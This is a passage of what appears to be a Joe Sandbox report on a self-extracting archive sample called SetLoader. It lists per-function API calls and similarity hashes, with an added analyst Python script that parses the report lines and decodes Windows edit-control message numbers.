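Reading the block above: GetDlgItem fetches dialog control 0x68, and the SendMessageW calls that follow carry edit-control and rich-edit messages (0xB1 EM_SETSEL, 0xC2 EM_REPLACESEL, 0x43A EM_GETCHARFORMAT, 0x444 EM_SETCHARFORMAT; the last two are WM_USER+58 and WM_USER+68), so the function is filling a text box with formatted text, the self-extractor's license or information pane, not payload logic. Joe Sandbox prints the message numbers raw, which is what makes such blocks easy to misread. The Python below is an added analyst example, not report or sample code: it parses the report's "• Api.MODULE(args), ref: addr" and "Part of subcall function" lines into records and annotates SendMessageW and ShowWindow arguments with the public Windows constant names (values from winuser.h and richedit.h). The input lines are copied from this block; the constant table only covers the messages that occur here, which is the one assumption the example makes.

```python
"""Parse Joe Sandbox 'APIs' lines and decode edit-control message numbers.

Added analyst example, not report or sample code.  Constant values are the
public Windows definitions (winuser.h / richedit.h, WM_USER = 0x400).
"""
from __future__ import annotations

import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One report line: optional "Part of subcall function XXXX:" prefix, Api.MODULE,
# optional "(args)" (AllocConsole.KERNEL32 has none), optional comma, "ref: addr".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

WM_USER = 0x400
MESSAGE_NAMES = {
    0x00B1: "EM_SETSEL",
    0x00C2: "EM_REPLACESEL",
    WM_USER + 58: "EM_GETCHARFORMAT",   # 0x43A
    WM_USER + 68: "EM_SETCHARFORMAT",   # 0x444
}
SHOWWINDOW_CMDS = {0: "SW_HIDE", 5: "SW_SHOW"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int
    caller: Optional[str] = None   # set for "Part of subcall function" lines
    note: str = ""                 # decoded constant, if any


def _hex_arg(args: List[str], index: int) -> Optional[int]:
    """Argument `index` as an int, or None for '?', string arguments or missing."""
    try:
        return int(args[index], 16)
    except (IndexError, ValueError):
        return None


def annotate(call: ApiCall) -> str:
    """Name the message number (SendMessageW) or the show command (ShowWindow)."""
    if call.api == "SendMessageW":
        msg = _hex_arg(call.args, 1)
        if msg is None:
            return ""
        fallback = f"WM_USER+{msg - WM_USER}" if msg >= WM_USER else ""
        return MESSAGE_NAMES.get(msg, fallback)
    if call.api == "ShowWindow":
        return SHOWWINDOW_CMDS.get(_hex_arg(call.args, 1), "")
    return ""


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if m is None:
        return None
    raw = m["args"]
    # Joe Sandbox prints arguments comma-separated; a string argument containing a
    # comma would be split as well, which is acceptable for triage output.
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    call = ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["caller"])
    call.note = annotate(call)
    return call


def parse_report(lines) -> List[ApiCall]:
    return [c for c in map(parse_api_line, lines) if c is not None]


def decoded_messages(lines) -> List[Tuple[str, str]]:
    """(api, decoded constant) for every call the annotator understood, in report order."""
    return [(c.api, c.note) for c in parse_report(lines) if c.note]


# Lines copied from the function block above (constructed input for the example).
REPORT_LINES = """\
  • Part of subcall function 0062D864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
• GetDlgItem.USER32(00000068,00673CF0), ref: 0062F81F
• ShowWindow.USER32(00000000,00000005,?,?,0062D099,00000001,?,?,0062DAB9,006482F0,00673CF0,00673CF0,00001000,?,00000000,?), ref: 0062F844
• SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0062F853
• SendMessageW.USER32(00000000,000000C2,00000000,006465F4), ref: 0062F861
• SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0062F895
• SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0062F8D9
• AllocConsole.KERNEL32 ref: 00622E66
""".splitlines()


if __name__ == "__main__":
    for call in parse_report(REPORT_LINES):
        print(f"{call.ref:08X} {call.api}.{call.module} {call.note}")
```

The same parser reads every "APIs" block on this page; extending MESSAGE_NAMES is all that is needed to name further messages, and the `ref` address lets a record be matched back to the basic block in the control-flow listing.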

                                               Control-flow Graph (rendered graph omitted; executed/not-executed colouring not recoverable): basic blocks 62fafc-62fd95, with ShellExecuteExW at 62fc73, IsWindowVisible at 62fca3, ShowWindow at 62fcae, WaitForInputIdle at 62fcb8, GetExitCodeProcess at 62fce3, CloseHandle at 62fd0e and ShowWindow at 62fd75

                                              APIs
                                              • _wcslen.LIBCMT ref: 0062FB35
                                              • ShellExecuteExW.SHELL32(?), ref: 0062FC78
                                              • IsWindowVisible.USER32(?), ref: 0062FCA4
                                              • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0062FCB0
                                              • WaitForInputIdle.USER32(?,000007D0), ref: 0062FCC1
                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 0062FCEC
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0062FD12
                                              • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 0062FD78
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                              • String ID: .exe$.inf$Install
                                              • API String ID: 3646668279-1844831949
                                              • Opcode ID: d0db2312ad25cf43d7b6add6f148b6e5751173a451febffab80a4d760ff8c927
                                              • Instruction ID: 338a7cc988b20c545361a23d550de973025e8dd1b8426865d28d61a950a0b44c
                                              • Opcode Fuzzy Hash: d0db2312ad25cf43d7b6add6f148b6e5751173a451febffab80a4d760ff8c927
                                              • Instruction Fuzzy Hash: A161CE71108BA49AD7219F24F850AEBBBF7AF85704F04483DF8C59B391DBB089858F52

                                              Control-flow Graph

                                              APIs
                                              • __aulldiv.LIBCMT ref: 0062331D
                                                • Part of subcall function 0061D076: GetVersionExW.KERNEL32(?), ref: 0061D0A7
                                              • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00623340
                                              • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00623352
                                              • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 00623363
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00623373
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00623383
                                              • FileTimeToSystemTime.KERNEL32(?,?,?), ref: 006233BE
                                              • __aullrem.LIBCMT ref: 00623464
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                              • String ID:
                                              • API String ID: 1247370737-0
                                              • Opcode ID: 74c6fb5eacc43c7f0a8ae3e6af1494e9c12c728fa349538227960f4e22a92d7e
                                              • Instruction ID: 4a4b267cce4fbddf1fc3eb53e3606fadd0a5e455187ddd22811606c5d469f7f5
                                              • Opcode Fuzzy Hash: 74c6fb5eacc43c7f0a8ae3e6af1494e9c12c728fa349538227960f4e22a92d7e
                                              • Instruction Fuzzy Hash: D75137B1508355AFC710DF64D88096BBBFAFB89714F00892EF596C7210E738EA48CB52

                                               Control-flow Graph (rendered graph omitted; executed/not-executed colouring not recoverable): basic blocks 63cfab-63d1c6, with MultiByteToWideChar at 63cfec and 63d080 and WideCharToMultiByte at 63d17f

                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00637F99,00637F99,?,?,?,0063D1FC,00000001,00000001,62E85006), ref: 0063D005
                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0063D1FC,00000001,00000001,62E85006,?,?,?), ref: 0063D08B
                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0063D185
                                              • __freea.LIBCMT ref: 0063D192
                                                • Part of subcall function 0063BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00636A24,?,0000015D,?,?,?,?,00637F00,000000FF,00000000,?,?), ref: 0063BCC0
                                              • __freea.LIBCMT ref: 0063D19B
                                              • __freea.LIBCMT ref: 0063D1C0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                              • String ID:
                                              • API String ID: 1414292761-0
                                              • Opcode ID: 29544ee0a5febfdd5f50a6eec5d2c5fb4021f5722a7675d5503d6a1884feff62
                                              • Instruction ID: 440eff9ee210e12cc0d3ab2f46322175f36af9d5ca58f354b35f25cdad7010b4
                                              • Opcode Fuzzy Hash: 29544ee0a5febfdd5f50a6eec5d2c5fb4021f5722a7675d5503d6a1884feff62
                                              • Instruction Fuzzy Hash: 2551BF72A00216ABEB258E64EC82EFB77ABEB45750F15462CFD04DA280DB74DC84C6D4

                                              Control-flow Graph

                                              APIs
                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 006235E6
                                                • Part of subcall function 0061D076: GetVersionExW.KERNEL32(?), ref: 0061D0A7
                                              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0062360A
                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00623624
                                              • TzSpecificLocalTimeToSystemTime.KERNELBASE(00000000,?,?), ref: 00623637
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00623647
                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00623657
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Time$File$System$Local$SpecificVersion
                                              • String ID:
                                              • API String ID: 2092733347-0
                                              • Opcode ID: 57e89793c334cbbe3fbb4c4c5da4aad6b1d6f4a6ceed9fea2a257c8dca970057
                                              • Instruction ID: a35580ecb8c1e48d429a5bd787cb75eb23fa9772c6ac08997fe07f6040098901
                                              • Opcode Fuzzy Hash: 57e89793c334cbbe3fbb4c4c5da4aad6b1d6f4a6ceed9fea2a257c8dca970057
                                              • Instruction Fuzzy Hash: A741297A1083159BCB04DFA8D88499BB7E9FF99704F04991EF999C7310E730D909CBA6

                                               Control-flow Graph (rendered graph omitted; executed/not-executed colouring not recoverable): basic blocks 62d392-62d419, with GetCurrentProcess and OpenProcessToken at 62d392, GetTokenInformation at 62d3b2 and 62d3d7, GetLastError at 62d3cc and CopySid at 62d3fa

                                              APIs
                                              • GetCurrentProcess.KERNEL32(00020008,?), ref: 0062D3A1
                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0062D3A8
                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 0062D3C2
                                              • GetLastError.KERNEL32 ref: 0062D3CC
                                              • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 0062D3F0
                                              • CopySid.ADVAPI32(00000044,?,00000000), ref: 0062D401
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: Token$InformationProcess$CopyCurrentErrorLastOpen
                                              • String ID:
                                              • API String ID: 3984476752-0
                                              • Opcode ID: 4f33030927f36f88fcab7fcc925bce6991fe4ca81102e96f8d5ab2c7a042d219
                                              • Instruction ID: c2005a1c62823afa52ef406fdee290da582af7b7f59a90ae8398d9f60c9f227d
                                              • Opcode Fuzzy Hash: 4f33030927f36f88fcab7fcc925bce6991fe4ca81102e96f8d5ab2c7a042d219
                                              • Instruction Fuzzy Hash: 55018CB5500218FFDF156FA0EC89EEF7BBEEF16350F100025F605A1190EA719E80EA64

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 006228AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 006228D4
                                                • Part of subcall function 006228AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00621309,Crypt32.dll,00000000,00621383,00000200,?,00621366,00000000,00000000,?), ref: 006228F4
                                              • OleInitialize.OLE32(00000000), ref: 0062CCF2
                                              • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0062CD29
                                              • SHGetMalloc.SHELL32(0065C460), ref: 0062CD33
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                              • String ID: riched20.dll$3To
                                              • API String ID: 3498096277-2168385784
                                              • Opcode ID: 82ed834304009cdb55e10c49d2dd56286df1698d4c0403121578d96d7ed690a4
                                              • Instruction ID: 5fda4625c88dcf08125f37c3e4869daabaa7b7ab210e0f05551d68413396e77c
                                              • Opcode Fuzzy Hash: 82ed834304009cdb55e10c49d2dd56286df1698d4c0403121578d96d7ed690a4
                                              • Instruction Fuzzy Hash: 63F062B1C00209ABCB10AF99D8499EFFFFDEF90700F00405AE415E2240CBB44685CFA1

                                              Control-flow Graph (graph image not reproduced; raw edge data omitted)
                                              APIs
                                              • CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00618846,?,00000005), ref: 0061B342
                                              • GetLastError.KERNEL32(?,?,00618846,?,00000005), ref: 0061B34F
                                              • CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00618846,?,00000005), ref: 0061B382
                                              • GetLastError.KERNEL32(?,?,00618846,?,00000005), ref: 0061B38A
                                              • SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00618846,?,00000005), ref: 0061B3D9
                                              Similarity
                                              • API ID: File$CreateErrorLast$Time
                                              • String ID:
                                              • API String ID: 1999340476-0
                                              • Opcode ID: 2c2c15d1d0738c86bb35dd2102e53f362385d8cadb3a690476cbef28a47c6c13
                                              • Instruction ID: ee2aee034a438483468b874b42b02f421d357a9125aca37b3002fa100473111e
                                              • Opcode Fuzzy Hash: 2c2c15d1d0738c86bb35dd2102e53f362385d8cadb3a690476cbef28a47c6c13
                                              • Instruction Fuzzy Hash: 52418830504741AFD320DF24DD45BEABBEABB06720F181A1DF5B1C62D0D7B09998CB92

                                              Control-flow Graph (graph image not reproduced; raw edge data omitted)
                                              APIs
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0062D875
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0062D886
                                              • IsDialogMessageW.USER32(00010418,?), ref: 0062D89A
                                              • TranslateMessage.USER32(?), ref: 0062D8A8
                                              • DispatchMessageW.USER32(?), ref: 0062D8B2
                                              Similarity
                                              • API ID: Message$DialogDispatchPeekTranslate
                                              • String ID:
                                              • API String ID: 1266772231-0
                                              • Opcode ID: 6427e81bebdbc7f46d8e167144033dab5b7b8102e0262311614d66e9ef3ab041
                                              • Instruction ID: a358a63230a2bad8e1b7d731a554011d8c1db0e8f66857e1450364d1b21f4076
                                              • Opcode Fuzzy Hash: 6427e81bebdbc7f46d8e167144033dab5b7b8102e0262311614d66e9ef3ab041
                                              • Instruction Fuzzy Hash: C2F03AB190122AABDB24ABF6EC0CDEB7FBDEE052917009010F90AD2140E768D506CBB0

                                              Control-flow Graph (graph image not reproduced; raw edge data omitted)
                                              APIs
                                              • GetTempPathW.KERNEL32(00000800,?), ref: 0062F1A7
                                                • Part of subcall function 0061D52F: _wcslen.LIBCMT ref: 0061D535
                                              • _swprintf.LIBCMT ref: 0062F1DC
                                                • Part of subcall function 00614C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00614C13
                                              • SetDlgItemTextW.USER32(?,00000066,00664892), ref: 0062F1F5
                                              Strings
                                              Similarity
                                              • API ID: ItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                              • String ID: %s%s%u
                                              • API String ID: 1453054206-1360425832
                                              • Opcode ID: a87ceea12ae3e5fbf8fc82215117eb19ec9b7f44a0d3a4dedd0735f4a1d90d34
                                              • Instruction ID: 0b0d6ef381fef4c0dba849a27edb81c0efa5dde70c05f949e7badc2a2891c6c6
                                              • Opcode Fuzzy Hash: a87ceea12ae3e5fbf8fc82215117eb19ec9b7f44a0d3a4dedd0735f4a1d90d34
                                              • Instruction Fuzzy Hash: 3E519172500AA9AADF71DBA0EC45FEF33BEBB09344F04043AE909DB151EB7196458F64
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000050), ref: 0062CB6A
                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0062CBA1
                                                • Part of subcall function 00624168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,0061E084,00000000,.exe,?,?,00000800,?,?,?,0062AD5D), ref: 0062417E
                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0062CB91
                                              Strings
                                              Similarity
                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                              • String ID: EDIT
                                              • API String ID: 4243998846-3080729518
                                              • Opcode ID: aecf90eca4f355c82826b2a94ade59afb38d44b549a421d6103bb5cfc80b2097
                                              • Instruction ID: a0372e26f4ab9cfa550914384aa58685fb8e15e11a6f4018f162b0d55c7a7af6
                                              • Opcode Fuzzy Hash: aecf90eca4f355c82826b2a94ade59afb38d44b549a421d6103bb5cfc80b2097
                                              • Instruction Fuzzy Hash: 1BF0C831601728BBDB20DB249C06F9F77AD9F9A701F010055B945B7280DB70D941CEA9
                                              APIs
                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0062FFFE
                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00630038
                                              Strings
                                              Similarity
                                              • API ID: EnvironmentVariable
                                              • String ID: sfxcmd$sfxpar
                                              • API String ID: 1431749950-3493335439
                                              • Opcode ID: 5b8dad50bad3c8fc7ff96ee2ca40f3117f288d22f8e89f869b265cbdd4ee319c
                                              • Instruction ID: f1f45bd7cbad152fa6807b7c809db6291b1cf68147f3089ab3453bc5ab9cacb6
                                              • Opcode Fuzzy Hash: 5b8dad50bad3c8fc7ff96ee2ca40f3117f288d22f8e89f869b265cbdd4ee319c
                                              • Instruction Fuzzy Hash: FDF0F6B2901235ABD724AF949C159AF73DEDF0EB40F000059BD419B241DBB09D40CAE5
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,?,006361E3,00000000,?,006760C8,?,?,?,00636386,00000004,InitializeCriticalSectionEx,00649624,InitializeCriticalSectionEx), ref: 0063623F
                                              • GetLastError.KERNEL32(?,006361E3,00000000,?,006760C8,?,?,?,00636386,00000004,InitializeCriticalSectionEx,00649624,InitializeCriticalSectionEx,00000000,?,0063613D), ref: 00636249
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00636271
                                              Strings
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID: api-ms-
                                              • API String ID: 3177248105-2084034818
                                              • Opcode ID: 9325b68d920a79afd49212d0130b3b3dec90ca12ec8883add15344cdaa91e41a
                                              • Instruction ID: 457ca706b35968f8a279c2662568ec9efe8ffdaf12b6cacf6386e1c6c99e4cd6
                                              • Opcode Fuzzy Hash: 9325b68d920a79afd49212d0130b3b3dec90ca12ec8883add15344cdaa91e41a
                                              • Instruction Fuzzy Hash: 55E04F34680304BBEF101F61EC06F9B3F67AB13B51F114020FA0DA81E1DBB19A5095C5
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B161
                                              • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B179
                                              • GetLastError.KERNEL32(?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B1AB
                                              • GetLastError.KERNEL32(?,?,?,00000000,0061B662,?,?,00000000,?,?), ref: 0061B1CA
                                              Similarity
                                              • API ID: ErrorLast$FileHandleRead
                                              • String ID:
                                              • API String ID: 2244327787-0
                                              • Opcode ID: 30f0a27d7b968c5af1ec29b149fc898c06da3adb32fbf12fc271a10fbf152e2a
                                              • Instruction ID: fcc1c8f23a6170dbb51805acc155c68c53530f902b30722bded56ba40d9de00d
                                              • Opcode Fuzzy Hash: 30f0a27d7b968c5af1ec29b149fc898c06da3adb32fbf12fc271a10fbf152e2a
                                              • Instruction Fuzzy Hash: 8411C235500204FBDB215F21DC1A6ED37ABFB06361F19A529F81685390D770DEC49B52
                                              APIs
                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,0063688D,00000000,00000000,?,0063D32B,0063688D,00000000,00000000,00000000,?,0063D528,00000006,FlsSetValue), ref: 0063D3B6
                                              • GetLastError.KERNEL32(?,0063D32B,0063688D,00000000,00000000,00000000,?,0063D528,00000006,FlsSetValue,0064AC00,FlsSetValue,00000000,00000364,?,0063BA77), ref: 0063D3C2
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0063D32B,0063688D,00000000,00000000,00000000,?,0063D528,00000006,FlsSetValue,0064AC00,FlsSetValue,00000000), ref: 0063D3D0
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: bac07ca06c4be56d06e0fbb2655b65d5a628b2bdc994d060a341c38c9e0612e6
                                              • Instruction ID: a80c8fc702a835f4fd513fe4be1ec588350c7858fc585b1a9f456a829db91639
                                              • Opcode Fuzzy Hash: bac07ca06c4be56d06e0fbb2655b65d5a628b2bdc994d060a341c38c9e0612e6
                                              • Instruction Fuzzy Hash: C701FC36251226ABDB214B68FC44A97379EFF07B61B111620F916D7240C730DC0186E2
                                              APIs
                                                • Part of subcall function 0063B9A5: GetLastError.KERNEL32(?,?,00636E12,?,?,?,0063688D,00000050,?), ref: 0063B9A9
                                                • Part of subcall function 0063B9A5: _free.LIBCMT ref: 0063B9DC
                                                • Part of subcall function 0063B9A5: SetLastError.KERNEL32(00000000,?), ref: 0063BA1D
                                                • Part of subcall function 0063B9A5: _abort.LIBCMT ref: 0063BA23
                                                • Part of subcall function 0063E19E: _abort.LIBCMT ref: 0063E1D0
                                                • Part of subcall function 0063E19E: _free.LIBCMT ref: 0063E204
                                                • Part of subcall function 0063DE0B: GetOEMCP.KERNEL32(00000000,?,?,0063E094,?), ref: 0063DE36
                                              • _free.LIBCMT ref: 0063E0EF
                                              • _free.LIBCMT ref: 0063E125
                                              Strings
                                              Similarity
                                              • API ID: _free$ErrorLast_abort
                                              • String ID: p,e
                                              • API String ID: 2991157371-2941865787
                                              • Opcode ID: 1858308ce9b68ad07099a16fecddc16c45caee8d51a0d8ce1bc7440b04c66dde
                                              • Instruction ID: f495019b81a9c3e0feaba9f291383d650d066e49450312db9efd57f00f2cacff
                                              • Opcode Fuzzy Hash: 1858308ce9b68ad07099a16fecddc16c45caee8d51a0d8ce1bc7440b04c66dde
                                              • Instruction Fuzzy Hash: E831AF31900608AFDB24EBA9D841A99B7F7EF81320F25509DE5049B2D1EBB29D51CBA4
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0061F306,00000001,?,?,?,00000000,00627564,?,?,?,?), ref: 0061B9DE
                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0061BA25
                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0061F306,00000001,?,?,?), ref: 0061BA51
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                               • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
